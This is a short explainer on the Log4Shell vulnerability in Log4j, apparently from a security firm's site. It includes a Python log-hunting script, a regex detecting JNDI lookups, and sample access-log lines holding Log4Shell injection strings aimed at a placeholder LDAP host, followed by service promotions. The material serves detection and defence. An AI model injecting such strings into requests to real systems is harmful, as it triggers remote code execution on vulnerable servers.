Log4Shell is a remotely exploitable vulnerability that affects Log4j, the Java component used by thousands of applications to keep logs of application activity.
Log4Shell is the name given to the vulnerability that MITRE identifies as CVE-2021-44228. It takes advantage of a data filtering flaw in this component that allows a JNDI injection to be carried out. Through this flaw it was possible to inject specially crafted strings that allowed arbitrary code execution.
In most cases, it was enough to add this content to any HTTP request to force the Log4j component to establish a connection to the attacker’s LDAP server and execute arbitrary code.
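Because the crafted string can arrive in any part of an HTTP request, a first hunting step is to search web server logs for JNDI lookup tokens. The following is an added example, not code from Tarlogic or from the Log4j project: it scans access-log lines for plain and percent-encoded lookups and reports the remote host each one points to. It goes slightly beyond the LDAP case described above by matching any scheme after the `jndi:` prefix; the function names, log lines and host names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# "${jndi:<scheme>://<host>" in any letter case; LDAP is the case described above.
JNDI_LOOKUP = re.compile(r'\$\{jndi:([a-z][a-z0-9+.-]*)://([^/}\s"]+)', re.IGNORECASE)


def decode_repeatedly(text, rounds=3):
    """Percent-decode up to `rounds` times so double-encoded input is still seen."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def find_jndi_lookups(log_lines):
    """Return (line_number, scheme, remote_host) for each lookup string found."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        for match in JNDI_LOOKUP.finditer(decode_repeatedly(line)):
            hits.append((number, match.group(1).lower(), match.group(2)))
    return hits


# Constructed sample access-log lines; addresses and hosts are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Dec/2021:10:00:07 +0000] "GET /login HTTP/1.1" 200 734 "-" "${jndi:ldap://collector.example.invalid/a}"',
    '192.0.2.45 - - [10/Dec/2021:10:00:09 +0000] "GET /search?q=%24%7BJNDI%3ALDAP%3A%2F%2Fcollector.example.invalid%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '192.0.2.46 - - [10/Dec/2021:10:00:12 +0000] "GET /docs/jndi-overview HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, scheme, host in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup via {scheme} to {host}")
```

A hit only shows that a lookup string reached the server; whether the application acted on it has to be confirmed from outbound connection telemetry for the reported host.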
Cybersecurity articles related to Log4Shell
Various technical articles concerning Log4Shell and cybersecurity have been released on Tarlogic’s web page.
- Log4shell full picture: All the vulnerabilities affecting Log4j
- Log4Shell vulnerability CVE-2021-44228, the new cyber-apocalypse
- Tracking JNDI attacks: Hunting Log4Shell in your network
- CVE-2022-42889: Text4Shell, Critical Vulnerability in Apache Commons Text
Cybersecurity services related to Log4Shell
Vulnerability management: This continuous vulnerability assessment service allows for managing the vulnerability life cycle and minimizing the exposure surface.
- More information: Vulnerability management as a service
Emerging vulnerabilities: This service is triggered when a critical vulnerability, like Log4Shell, that could impact your organization’s perimeter is published, enabling early reaction. We examine the impact of zero-day vulnerabilities on the perimeter 24 hours a day, 7 days a week, and pinpoint affected assets.
- More information: Emerging Threats service
Threat Hunting: A managed service focused on the proactive detection of suspicious behavior and threat containment in endpoints, utilizing telemetry produced by EDR and XDR technologies, and adhering to the methodology outlined in the MITRE ATT&CK framework.
- More information: Threat Hunting service